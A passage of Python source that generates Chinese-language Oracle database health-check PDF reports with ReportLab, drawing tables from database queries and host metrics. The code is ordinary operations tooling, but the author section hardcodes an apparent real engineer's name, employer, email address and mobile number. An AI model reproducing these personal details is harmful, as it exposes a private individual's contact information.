colors.black),\n ('LINEBELOW', (0, -1), (-1, -1), 3, colors.green, 'butt'),\n ('LINEBELOW', (0, -1), (-1, -1), 1, colors.white, 'butt'),\n ('FONT', (0, 0), (-1, 0), 'msyh'),\n ('FONT', (0, 0), (-1, -1), 'msyh'),\n ('FONTSIZE', (0, 0), (-1, -1), 8),\n ('ALIGN', (2, 1), (-1, -1), 'LEFT'),\n ('TEXTCOLOR', (0, 1), (0, -1), colors.black),\n ('BACKGROUND', (0, 0), (-1, 0), colors.Color(0, 0.7, 0.7))]\n )\n t.setStyle(ts)\n if title is not None:\n lst.append(Paragraph(title, makeTableTitleStyle()))\n lst.append(t)\n if note is not None:\n lst.append(Paragraph(note, makeBodyStyle()))\n lst.append(Spacer(0, 0.5 * cm))\n return lst\n\ndef wrapTable(data, cols=None, style=makeBodyStyle(firstLineIndent=0)):\n ''' To auto wrap text in the cells of the table.\n usage: data = wrapTable(data, cols=[1,2])\n '''\n formated_data = []\n\n collist = []\n if isinstance(cols, int):\n collist.append(cols)\n cols = tuple(collist)\n\n for dvalue in data:\n nvalue = list(dvalue)\n if cols is not None:\n for i in cols:\n nvalue[i] = Paragraph(nvalue[i], style)\n formated_data.append(nvalue)\n\n return formated_data\n\nclass MyDocTemplate(BaseDocTemplate):\n \"The document template used for all PDF documents.\"\n\n _invalidInitArgs = ('pageTemplates',)\n\n def __init__(self, conf, filename, **kw):\n frame_first_page = Frame(2.5 * cm, 2.5 * cm, 15 * cm, 25 * cm, id='first')\n frame_remaining_pages = Frame(2.5 * cm, 2.5 * cm, 16 * cm, 25 * cm, id='remaining')\n frame_last_page = Frame(2.5 * cm, 2.5 * cm, 15 * cm, 25 * cm, id='last')\n self.allowSplitting = 0\n BaseDocTemplate.__init__(self, filename, **kw)\n firstpage_template = PageTemplate(id='first_page', frames=frame_first_page, onPage=self.on_first_page)\n mainpage_template = PageTemplate(id='remaining_pages', frames=frame_remaining_pages, onPage=self.on_remaining_pages)\n lastpage_template = PageTemplate(id='last_page', frames=frame_last_page, onPage=self.on_last_page)\n\n self.addPageTemplates([firstpage_template, mainpage_template, lastpage_template])\n \n self.rptsettings = conf.getReportSetting()\n \n #print(self.rptsettings)\n\n def afterFlowable(self, flowable):\n \"Registers TOC entries.\"\n if flowable.__class__.__name__ == 'Paragraph':\n styleName = flowable.style.name\n if styleName[:7] == 'Heading':\n key = str(hash(flowable))\n self.canv.bookmarkPage(key)\n\n # Register TOC entries.\n level = int(styleName[7:])\n text = flowable.getPlainText()\n\n pageNum = self.page - 1\n # Try calling this with and without a key to test both\n # Entries of every second level will have links, others won't\n if level % 2 == 1:\n self.notify('TOCEntry', (level, text, pageNum, key))\n else:\n self.notify('TOCEntry', (level, text, pageNum))\n\n key = str(hash(flowable))\n canvas = self.canv\n canvas.setFont(myFontName, 12)\n\n # 在页眉生成格式为标题1的标题内容\n global gtext\n if text and level == 0:\n gtext = text\n canvas.drawString(1.1 * inch, 11.10 * inch, gtext)\n\n # 生成标签\n canvas.bookmarkPage(key)\n canvas.addOutlineEntry(text, key, level=level, closed=0)\n\n def on_first_page(self, canvas, doc):\n canvas.saveState()\n\n # 封面字体及字体大小\n canvas.setFont(myFontName, 19)\n\n # 封面背景\n canvas.setFillColorRGB(0.9, 0.9, 0.9)\n canvas.setStrokeColorRGB(0.6, 0.6, 0.6)\n canvas.rect(0 * cm, 0.5 * cm, 25 * cm, 30 * cm, fill=1)\n\n # 封面上下彩线\n count = 0\n for i in range(0, 12):\n if count % 2 == 0:\n canvas.setStrokeColorRGB(0.6, 0.6, 0.6)\n # 设置线的粗细\n canvas.setLineWidth(1)\n else:\n canvas.setStrokeColorRGB(0.0, 0.3, 0.6)\n canvas.setLineWidth(3)\n\n # 绘制顶部线\n canvas.line(0 * inch, (0.0 + i * 0.025) * inch, 8.5 * inch, (0 + i * 0.025) * inch)\n # 绘制底部线\n canvas.line(0 * inch, (11.4 + i * 0.025) * inch, 8.5 * inch, (11.4 + i * 0.025) * inch)\n count = count + 1\n\n # 封面标题\n date_range = calendar.monthrange(datetime.datetime.now().year, datetime.datetime.now().month)\n year = str(datetime.datetime.now().year)\n month = str(datetime.datetime.now().month)\n start_date = str(1)\n end_date = str(date_range[1])\n title = self.rptsettings['report_title']\n title1 = self.rptsettings['report_title1']\n if self.rptsettings['report_title2'] and self.rptsettings['report_title2'] != '':\n title2 = self.rptsettings['report_title2']\n else:\n title2 = '(' + year + '/' + month + '/' + start_date + '-' + year + '/' + month + '/' + end_date + ')'\n\n #print((8.3-(8.3/21.5)*title.__len__())/2)\n canvas.setFillColorRGB(0, 0.3, 0.6)\n canvas.setFont(myFontName, 28)\n # width = 8.3*inch\n canvas.drawString(((8.3-(8.3/21.5)*title.__len__())/2)*inch, 10 * inch, title)\n canvas.drawString(((8.3-(8.3/21.5)*title1.__len__())/2) * inch, 9.5 * inch, title1)\n canvas.setFillColorRGB(0, 0, 0)\n canvas.setFont(myFontName, 16)\n canvas.drawString(2.8 * inch, 9 * inch, title2)\n\n\n # 封面中间部分,图片和部分文字\n canvas.setFillColorRGB(0.0, 0.3, 0.6)\n canvas.setStrokeColorRGB(0.0, 0.3, 0.6)\n canvas.drawImage(self.rptsettings['cover_logo'], 0 * inch, 3.5 * inch, 600, 330)\n canvas.line(0 * inch, 8.1 * inch, 8.5 * inch, 8.1 * inch)\n canvas.line(0 * inch, 3.5 * inch, 8.5 * inch, 3.5 * inch)\n canvas.setFillColorRGB(0.6, 0.6, 0.6)\n canvas.drawString(0.5 * inch, 5 * inch, '集成技术解决方案')\n canvas.drawString(0.5 * inch, 4.7 * inch, '虚拟化、云计算和大数据')\n canvas.drawString(0.5 * inch, 4.4 * inch, '数据库高端运维服务')\n canvas.drawString(0.5 * inch, 4.1 * inch, '系统、网络与安全')\n\n # 封面右下角\n canvas.drawImage(self.rptsettings['company_logo'], 6.8 * inch, 0.75 * inch, 25, 25)\n canvas.setStrokeColorRGB(0, 0, 0)\n canvas.setFillColorRGB(0, 0.3, 0.6)\n canvas.setFont(myFontName, 12)\n canvas.drawString(7.2 * inch, 0.95 * inch, self.rptsettings['company_name_short'])\n canvas.setFont(myFontName, 11)\n canvas.drawString(7.2 * inch, 0.77 * inch, 'Vision-IT')\n canvas.setStrokeColorRGB(0, 0.3, 0.6)\n canvas.setFillColorRGB(0, 0, 0)\n canvas.setFont(myFontName, 10)\n canvas.drawString(6.2 * inch, 0.55 * inch, self.rptsettings['company_name'])\n canvas.drawString(6.4 * inch, 0.4 * inch, self.rptsettings['company_website'])\n canvas.setFont(myFontName, 18)\n canvas.setFillColorRGB(0, 0, 0)\n canvas.drawString(1.75 * inch, 3 * inch, '专业运维团队,24X7小时服务,让您更放心!')\n\n canvas.restoreState()\n\n def on_last_page(self, canvas, doc):\n canvas.saveState()\n\n # 封面字体及字体大小\n canvas.setFont(myFontName, 19)\n\n # 封面背景\n canvas.setFillColorRGB(0.9, 0.9, 0.9)\n canvas.setStrokeColorRGB(0.6, 0.6, 0.6)\n canvas.rect(0 * cm, 0.5 * cm, 25 * cm, 30 * cm, fill=1)\n\n # 封面中间部分���图片和部分文字\n for i in range(0, 25):\n if i % 2 == 0:\n canvas.setStrokeColorRGB(0.8, 0.8, 0.8)\n else:\n canvas.setStrokeColorRGB(0.8, 0.8, 0.8)\n\n canvas.setLineWidth((0.025 + 0.01 * i) * inch)\n canvas.line(0 * inch, (8 - (0.05 * i + 0.01 * i * (i + 1) / 2)) * inch, 8.5 * inch, (8 - (0.05 * i + 0.01 * i * (i + 1) / 2)) * inch)\n\n canvas.setStrokeColorRGB(0.0, 0.3, 0.6)\n canvas.setLineWidth(3)\n canvas.line(0 * inch, 8.1 * inch, 8.5 * inch, 8.1 * inch)\n canvas.line(0 * inch, 3.5 * inch, 8.5 * inch, 3.5 * inch)\n\n # 封面上下彩线\n count = 0\n for i in range(0, 12):\n if count % 2 == 0:\n canvas.setStrokeColorRGB(0.6, 0.6, 0.6)\n # 设置线的粗细\n canvas.setLineWidth(1)\n else:\n canvas.setStrokeColorRGB(0.0, 0.3, 0.6)\n canvas.setLineWidth(3)\n\n # 绘制顶部线\n canvas.line(0 * inch, (0.0 + i * 0.025) * inch, 8.5 * inch, (0 + i * 0.025) * inch)\n # 绘制底部线\n canvas.line(0 * inch, (11.4 + i * 0.025) * inch, 8.5 * inch, (11.4 + i * 0.025) * inch)\n count = count + 1\n\n # 封面右下角\n canvas.drawImage(self.rptsettings['company_logo'], 0.5 * inch, 1.25 * inch, 25, 25)\n canvas.setStrokeColorRGB(0, 0, 0)\n canvas.setFillColorRGB(0, 0.3, 0.6)\n canvas.setFont(myFontName, 12)\n canvas.drawString(0.9 * inch, 1.45 * inch, self.rptsettings['company_name_short'])\n canvas.setFont(myFontName, 11)\n canvas.drawString(0.9 * inch, 1.27 * inch, self.rptsettings['company_name_short_en'])\n canvas.setStrokeColorRGB(0, 0.3, 0.6)\n canvas.setFillColorRGB(0, 0, 0)\n canvas.setFont(myFontName, 12)\n canvas.drawString(0.5 * inch, 1.05 * inch, self.rptsettings['company_name'])\n canvas.setFont(myFontName, 8)\n canvas.drawString(0.5 * inch, 0.9 * inch, '网站:' + self.rptsettings['company_website'])\n canvas.drawString(0.5 * inch, 0.75 * inch, '地址:' + self.rptsettings['company_address'])\n canvas.drawString(0.5 * inch, 0.6 * inch, '电话:' + self.rptsettings['company_telephone'])\n\n BarCodes().genEan13Barcode(canvas, 6.5 * inch, 0.6 * inch, 50, 8)\n\n\n canvas.restoreState()\n\n\n def on_remaining_pages(self, canvas, doc):\n canvas.saveState()\n\n canvas.setFont(myFontName, 9)\n canvas.line(1 * inch, 1 * inch, 7.3 * inch, 1 * inch)\n canvas.line(1 * inch, 11 * inch, 7.3 * inch, 11 * inch)\n canvas.drawString(4 * inch, 0.75 * inch, \"Page %d\" % (doc.page - 1))\n\n canvas.restoreState()\n\n def set_content(self):\n # 设置目录索引等级,这里以设置为一级标题、二级标题、三级标题\n# print(self.rptsettings)\n if self.rptsettings['content_level'] and self.rptsettings['content_level'] != '':\n maxLevels = self.rptsettings['content_level']\n else:\n maxLevels = 3\n\n # Create styles to be used for document headers\n # on differnet levels.\n headerLevelStyles = []\n for i in range(maxLevels):\n headerLevelStyles.append(makeHeaderStyle(i))\n \n return maxLevels,headerLevelStyles\n\n\nclass OracleReport:\n \"\"\"Test story with TOC and a cascaded header hierarchy.\n\n The story should contain exactly one table of contents that is\n immediatly followed by a list of of cascaded levels of header\n lines, each nested one level deeper than the previous one.\n\n Features to be visually confirmed by a human being are:\n\n 1. TOC lines are indented in multiples of 1 cm.\n 2. Wrapped TOC lines continue with additional 0.5 cm indentation.\n 3. Only entries of every second level has links\n ...\n \"\"\"\n\n def __init__(self,conf,filename):\n doc = MyDocTemplate(conf,filename)\n self.maxLevels,self.headerLevelStyles = doc.set_content()\n self.dbsettings = conf.getDatabaseSetting()\n self.rptsettings = conf.getReportSetting()\n self.pkgsettings = conf.getPackageSetting()\n \n self.doc = doc\n\n\n def makeFirstPart(self):\n story = []\n\n return story\n\n def makeAuthorPart(self):\n story = []\n # 换页,开始新内容\n # 使用内容模版开始写内容\n story.append(NextPageTemplate('remaining_pages'))\n story.append(PageBreak())\n story.append(Paragraph('版权信息', makeListTitleStyle()))\n for cprt in self.rptsettings['copyright']:\n story.append(Paragraph(cprt, makeBodyStyle()))\n\n story.append(Spacer(0, 0.5 * cm))\n story.append(Paragraph('文档属性', makeListTitleStyle()))\n data = [('文档属性', '内容')]\n data.extend([('文档名称', self.rptsettings['report_title'] + self.rptsettings['report_title1']),\n ('文档版本号', self.rptsettings['report_version']),\n ('文档状态', '正式巡检报告'),\n ('文档特性', '自动化'),\n ('生成日期', time.strftime('%Y-%m-%d', time.localtime(time.time())))])\n story.extend(makeTable(data, colwidth=(80, 364)))\n\n story.append(Spacer(0, 0.5 * cm))\n story.append(Paragraph('作者信息', makeListTitleStyle()))\n data = [('姓名', '公司', '职位', '邮箱', '电话')]\n data.extend([('陈英', '贵州维讯信息技术有限公司', '系统工程师', 'ychenid@live.com', '15285649896')])\n story.extend(makeTable(data, colwidth=(48, 136, 64, 116, 80)))\n\n return story\n\n def makeCopInfo(self):\n inPath=self.rptsettings['flowshape']\n story = []\n # 换页\n story.append(PageBreak())\n story.append(Paragraph('1. 故障响应流程', makeListTitleStyle()))\n inPath = inPath\n img = Image(0, 0, 450, 300, inPath)\n d = Drawing(300, 300)\n d.add(img)\n# d.translate(420, 0)\n# d.scale(2, 2)\n# d.rotate(0)\n story.append(d)\n\n story.append(Spacer(0, 1 * cm))\n story.append(Paragraph('2. 项目服务工程师', makeListTitleStyle()))\n data = [('姓名', '公司', '职位', '邮箱', '电话')]\n data.extend(self.rptsettings['author'])\n story.extend(makeTable(data, colwidth=(48, 136, 64, 116, 80)))\n\n story.append(Paragraph('3. 报告审核签署', makeListTitleStyle()))\n story.append(Spacer(0, 0.2 * cm))\n story.append(Preformatted('文档名称:' + self.rptsettings['report_title'] + self.rptsettings['report_title1'], makeBodyStyle()))\n story.append(Preformatted('副本数量:' + str(self.rptsettings['report_copy']) + '份', makeBodyStyle()))\n story.append(Preformatted('出版单位:' + str(self.rptsettings['company_name']), makeBodyStyle()))\n story.append(Preformatted('出版日期:' + time.strftime('%Y-%m-%d', time.localtime(time.time())), makeBodyStyle()))\n story.append(Spacer(0, 1.5 * cm))\n story.append(Preformatted(80 * str(' ') + '巡检人:_____________ 日期:_____________' , makeBodyStyle()))\n story.append(Preformatted(80 * str(' ') + '审定人:_____________ 日期:_____________' , makeBodyStyle()))\n\n return story\n\n def makeSignature(self):\n story = []\n # 换页\n story.append(PageBreak())\n\n\n def makeContentPart(self):\n # Create styles to be used for TOC entry lines\n # for headers on differnet levels.\n tocLevelStyles = []\n d, e = tableofcontents.delta, tableofcontents.epsilon\n for i in range(self.maxLevels):\n tocLevelStyles.append(makeTocHeaderStyle(i, d, e))\n\n # Build story.\n story = []\n\n # 生成目录\n story.append(PageBreak())\n story.append(Paragraph(self.rptsettings['content_name'], makeTitleStyle()))\n story.append(Spacer(0, 1 * cm))\n toc = tableofcontents.TableOfContents()\n toc.levelStyles = tocLevelStyles\n story.append(toc)\n\n return story\n\n def makeManagedResourcetPart(self):\n story = []\n # 换页,开始新内容\n story.append(PageBreak())\n story.append(Paragraph('1. 运维资源对象', self.headerLevelStyles[0]))\n i_count = 1\n data = [('编号', '实例名称', '业务名称', '数据库名', '主机', '数据库版本')]\n for db in self.dbsettings.values():\n data.extend([(i_count, db['instance_name'], db['dbtitle'], db['dbname'], db['host'], db['dbversion'])])\n i_count += 1\n\n story.extend(makeTable(data, title='表1 数据库资源对象', colwidth=(32, 64, 120, 64, 100, 70)))\n return story\n\n def makeDBSummaryPart(self):\n story = []\n # 换页,开始新内容\n story.append(PageBreak())\n story.append(Paragraph('2. 数据库运行状态概览', self.headerLevelStyles[0]))\n\n d = DrawShape()\n status_online = d.drawArrow(10, 20, 20, 90, 0, -15, colors.green)\n status_offline = d.drawArrow(10, 20, 20, -90, -20, -5, colors.red)\n resource_usage = d.drawBattery(25, 20, 0.05, colors.green)\n crossbox_failure = d.drawCrossbox(20, 20, 20, 0, 0, colors.red, colors.white)\n crossbox_success = d.drawCrossbox(20, 20, 20, 0, 0, colors.green, colors.green)\n\n alert_failure = d.drawAlert(20, 20, 20, 0, 0, 4, colors.red)\n alert_success = d.drawAlert(20, 20, 20, 0, 0, 0, colors.green)\n\n i_count = 1\n data = [('实例', '状态', '库', '监听', 'CPU', '内存', '磁盘', '日志', '表空间', '告警', '备份', 'OGG', 'DG')]\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n dbdata = ['', '', '', '', '', '', '', '', '', '', '', '', '']\n dbdata[0] = db['instance_name']\n\n try:\n inststatus = oracle.instance_status()\n dbstatus = oracle.database_status()\n\n if inststatus[0][3] == 'OPEN':\n dbdata[1] = status_online\n else:\n dbdata[1] = status_offline\n\n if dbstatus[0][2] == 'READ WRITE':\n dbdata[2] = status_online\n else:\n dbdata[2] = status_offline\n\n dbdata[3] = status_online\n\n dbdata[4] = '?'\n dbdata[5] = '?'\n dbdata[6] = '?'\n dbdata[7] = '?'\n dbdata[8] = '?'\n dbdata[9] = '?'\n dbdata[10] = '?'\n dbdata[11] = '?'\n dbdata[12] = '?'\n except Exception:\n dbdata[1] = status_offline\n dbdata[2] = status_offline\n dbdata[3] = status_offline\n dbdata[4] = '?'\n dbdata[5] = '?'\n dbdata[6] = '?'\n dbdata[7] = '?'\n dbdata[8] = '?'\n dbdata[9] = '?'\n dbdata[10] = '?'\n dbdata[11] = '?'\n dbdata[12] = '?'\n\n data.extend([(dbdata[0], dbdata[1], dbdata[2], dbdata[3], dbdata[4], dbdata[5], dbdata[6], dbdata[7], dbdata[8], dbdata[9], dbdata[10], dbdata[11], dbdata[12])])\n i_count += 1\n\n# for db in self.dbsettings.values():\n# data.extend([('prod1',status_online,status_online,status_offline,resource_usage,resource_usage,resource_usage,\n# status_online,status_online,alert_failure,crossbox_failure,status_online,status_online)])\n# i_count += 1\n story.extend(makeTable(data, title='表2.1 数据库资源状态', colwidth=(56, 32, 32, 32, 32, 32, 32, 32, 40, 32, 32, 32, 32)))\n\n\n i_number = 1\n for db in self.dbsettings.values():\n hostmetric = HostMetric(db['host'], db['host_username'], db['host_password'], db['host_port'], self.pkgsettings['syslogin'])\n\n #print(hostmetric)\n story.append(Paragraph('(' + str(i_number) + ')' + db['dbtitle'] + '服务器当前状态', makeBodyStyle()))\n title = ''\n\n # 获取服务器负载信息\n data = [['Server', '1 mins', '5 mins', '15 mins']]\n try:\n results = hostmetric.get_load_metric()\n results = [db['dbtitle'], results[0][0], results[0][1], results[0][2]]\n note = ''\n except Exception:\n results = ['', '', '', '']\n note = '注释:服务器连接异常,请检查服务器运行是否正常。'\n\n data.append(results)\n\n story.append(Paragraph('>> 负载', makeBodyStyle()))\n story.extend(makeTable(data, title, note, colwidth=(80, 125, 120, 120)))\n\n # 获取CPU信息\n data = [['Server', 'CPU Used Ratio']]\n try:\n resutls = hostmetric.get_cpu_metric()\n\n results = [db['dbtitle'], resutls]\n note = ''\n except Exception:\n results = ['', '']\n note = '注释:服务器连接异常,请检查服务器运行是否正常。'\n\n data.append(results)\n story.append(Paragraph('>> CPU', makeBodyStyle()))\n story.extend(makeTable(data, title, note, colwidth=(80, 365)))\n\n # 获取内存信息\n data = [['Server', 'MemTotal', 'MemFree', 'Mem Used Rate']]\n try:\n results = hostmetric.get_mem_metric()\n results = [db['dbtitle'], results['MemTotal'], results['MemFree'], results['MemUsedRate']]\n note = ''\n except Exception:\n results = ['', '', '', '']\n note = '注释:服务器连接异常,请检查服务器运行是否正常。'\n\n data.append(results)\n story.append(Paragraph('>> 内存', makeBodyStyle()))\n story.extend(makeTable(data, title, note, colwidth=(80, 120, 120, 125)))\n\n # 获取磁盘使用信息\n data = [['FileSystem', 'Size', 'Used', 'Avail', 'Use%', 'Mounted on']]\n try:\n results = hostmetric.get_disk_metric()\n results = results[1:]\n note = ''\n except Exception:\n results = ['', '', '', '', '', '']\n note = '注释:服务器连接异常,请检查服务器运行是否正常。'\n\n data.extend(results)\n\n story.append(Paragraph('>> 磁盘', makeBodyStyle()))\n story.extend(makeTable(data, title, note, colwidth=(220, 32, 32, 32, 48, 96)))\n\n # 获取网卡使用信息\n data = [['Face', 'Bytes', 'Drop']]\n try:\n results = hostmetric.get_net_metric()\n results = results[1:]\n note = ''\n except Exception:\n results = ['', '', '']\n note = '注释:服务器连接异常,请检查服务器运行是否正常。'\n\n data.extend(results)\n story.append(Paragraph('>> 网络', makeBodyStyle()))\n story.extend(makeTable(data, title, note, colwidth=(100, 175, 175)))\n\n i_number += 1\n\n return story\n\n def makeStoragePart(self):\n story = []\n story.append(PageBreak())\n story.append(Paragraph('3. 数据库存储结构', self.headerLevelStyles[0]))\n\n i_number = 1\n\n story.append(Paragraph('3.1. 数据库物理存储结构', self.headerLevelStyles[1]))\n story.append(Paragraph('3.1.1 控制文件', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表3.' + str(i_number) + ' ' + db['dbtitle'] + '控制文件及副本'\n data = [('STATUS', 'NAME', 'SIZE')]\n\n try:\n results = oracle.controlfile()\n i_count = 0\n for i in results:\n if i[0] is None:\n i_count = i_count + 1\n note = '注释:' + db['dbtitle'] + '共有' + str(len(results)) + '个数据控制文件,其中有效文件有' + str(i_count) + '个,无效文件有' + str(len(results) - i_count) + '个。'\n except Exception:\n results = [('', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(1))\n data.extend(results)\n\n\n story.extend(makeTable(data, title, note, colwidth=(64, 300, 80)))\n i_number += 1\n\n story.append(Paragraph('3.1.2 日志文件', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表3.' + str(i_number) + ' ' + db['dbtitle'] + '日志文件'\n data = [('GROUP', 'STATUS', 'TYPE', 'MEMBER')]\n\n try:\n results = oracle.logfile()\n logcount = oracle.logcount()\n\n i_count = 0\n for i in results:\n if i[1] is None:\n i_count = i_count + 1\n note = '注释:' + db['dbtitle'] + '共有' + str(logcount[0][0]) + '日志组,' + str(len(results)) + '个日志文件文件,其中有效文件有' + str(i_count) + '个,无效文件有' + str(len(results) - i_count) + '个。'\n except Exception:\n results = [('', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(3))\n data.extend(results)\n\n\n story.extend(makeTable(data, title, note, colwidth=(64, 80, 80, 220)))\n i_number += 1\n\n story.append(Paragraph('3.1.3 数据文件', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表3.' + str(i_number) + ' ' + db['dbtitle'] + '数据文件存储结构'\n data = [('ID', 'NAME', 'STATUS', 'SIZE', 'MAXSIZE', 'EXTENSIBLE')]\n\n try:\n results = oracle.datafile()\n i_count = 0\n for i in results:\n if i[2] == 'ONLINE' or i[2] == 'SYSTEM':\n i_count = i_count + 1\n note = '注释:' + db['dbtitle'] + '共有' + str(len(results)) + '个数据文件,其中在线文件有' + str(i_count) + '个,离线文件有' + str(len(results) - i_count) + '个。'\n except Exception:\n results = [('', '', '', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(1))\n data.extend(results)\n\n\n story.extend(makeTable(data, title, note, colwidth=(32, 150, 64, 64, 64, 81)))\n i_number += 1\n\n story.append(Paragraph('3.2. 数据库逻辑存储结构', self.headerLevelStyles[1]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表3.' + str(i_number) + ' ' + db['dbtitle'] + '表空间及使用情况'\n data = [('NAME', 'STATUS', 'TOTAL', 'USED', 'FREE', 'USEDPCT')]\n\n try:\n results = oracle.tablespace()\n i_count = 0\n for i in results:\n if i[1] == 'ONLINE':\n i_count = i_count + 1\n note = '注释:' + db['dbtitle'] + '共有' + str(len(results)) + '个表空间,其中在线有' + str(i_count) + '个,离线有' + str(len(results) - i_count) + '个。'\n except Exception:\n results = [('', '', '', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(0))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(118, 81, 64, 64, 64, 64)))\n i_number += 1\n return story\n\n def makeDBObjectPart(self):\n story = []\n story.append(PageBreak())\n story.append(Paragraph('4. 数据库对象监测', self.headerLevelStyles[0]))\n story.append(Paragraph('4.1 数据库无效对象', self.headerLevelStyles[1]))\n i_number = 1\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表4.' + str(i_number) + ' ' + db['dbtitle'] + '数据库无效对象'\n\n data = [('OWER', 'NAME', 'TYPE', 'STATUS')]\n\n try:\n results = oracle.invalid_objects()\n note = '注释:' + db['dbtitle'] + '共有' + str(len(results)) + '个无效对象。'\n except Exception:\n results = [('', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(0))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(90, 164, 100, 100)))\n i_number += 1\n\n story.append(Paragraph('4.2. 数据库无效触发器', self.headerLevelStyles[1]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表4.' + str(i_number) + ' ' + db['dbtitle'] + '数据库无效触发器'\n\n data = [('OWER', 'TRIGGER', 'TABLE', 'STATUS')]\n try:\n results = oracle.disabled_triggers()\n note = '注释:' + db['dbtitle'] + '共有' + str(len(results)) + '个无效触发器。'\n except Exception:\n results = [('', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(0))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(90, 164, 100, 100)))\n i_number += 1\n\n story.append(Paragraph('4.3. 数据库无效索引', self.headerLevelStyles[1]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n\n title = '表4.' + str(i_number) + ' ' + db['dbtitle'] + '无效索引'\n\n data = [('OWER','NAME', 'TABLE', 'TABLESPACE', 'STATUS')]\n\n try:\n results = oracle.invalid_indexes()\n note = '注释:' + db['dbtitle'] + '共有' + str(len(results)) + '个无效索引。'\n except Exception:\n results = [('', '', '', '','')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(0,2))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(80,90, 104, 80, 80)))\n i_number += 1\n\n story.append(Paragraph('4.4. 数据库无效约束', self.headerLevelStyles[1]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n\n title = '表4.' + str(i_number) + ' ' + db['dbtitle'] + '无效约束'\n\n data = [('OWER', 'NAME', 'TABLE', 'TYPE', 'STATUS')]\n try:\n results = oracle.disabled_constraints()\n note = '注释:' + db['dbtitle'] + '共有' + str(len(results)) + '个无效约束。'\n except Exception:\n results = [('', '', '', '', '')]\n note = '注释:数据库连接异常,无法获取���关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(0, 1))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(80, 84, 80, 100, 100)))\n i_number += 1\n\n story.append(Paragraph('4.5. 数据库组件对象', self.headerLevelStyles[1]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n\n title = '表4.' + str(i_number) + ' ' + db['dbtitle'] + '数据库组件'\n\n data = [('ID', 'NAME', 'VERSION', 'STATUS')]\n try:\n results = oracle.register()\n note = '注释:' + db['dbtitle'] + '共有' + str(len(results)) + '个组件。'\n except Exception:\n results = [('', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(0, 1))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(80, 134, 130, 100)))\n i_number += 1\n\n return story\n\n def makePerformancePart(self):\n story = []\n story.append(PageBreak())\n story.append(Paragraph('5. 数据库性能分析', self.headerLevelStyles[0]))\n i_number = 1\n\n story.append(Paragraph('5.1 SQL性能统计', self.headerLevelStyles[1]))\n\n story.append(Paragraph('5.1.1 最近CPU消耗最高的前10条SQL', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表5.' + str(i_number) + ' ' + db['dbtitle'] + '数据库CPU消耗之SQL'\n\n data = [('SQL_ID', 'SQL_TEXT', 'CPU_TIME', 'DISK_READ_TIME', 'COUNTS')]\n\n try:\n results = oracle.sql_cpu_top_hist()\n note = '注释:以上列出的是最近消耗CPU资源排名前十的SQL语句'\n except Exception:\n results = [('', '', '', '', '')]\n note = '注释:数据库连接异常,无法获取相关信息,重试之前请保证数据库连接正常。'\n\n results = wrapTable(results, cols=(1))\n data.extend(results)\n story.extend(makeTable(data, title, note, colwidth=(64, 178, 64, 100, 48)))\n i_number += 1\n\n story.append(Paragraph('5.1.2 最近物理读消耗最高的前10条SQL', self.headerLevelStyles[2]))\n for db in self.dbsettings.values():\n oracle = Oracle(username=db['username'], password=db['password'], mode=db['mode'], host=db['host'], port=db['port'], instance=db['service_name'])\n title = '表5.' + str(i_number) + ' ' + db['dbtitle'] + '数据库IO消耗之SQL'\n\n data = [('SQL_ID', 'SQL_TEXT', 'DISK_GETS_TIME', 'CPU_TIME', 'COUNTS')]\n\n try:\n results = oracle.sql_disk_top_hist()\n note = '注释:以上列出的是最近消耗IO资源排名前十的SQL语句'\n except Exception:\n results = [('', '', '', '', '')]\n note = 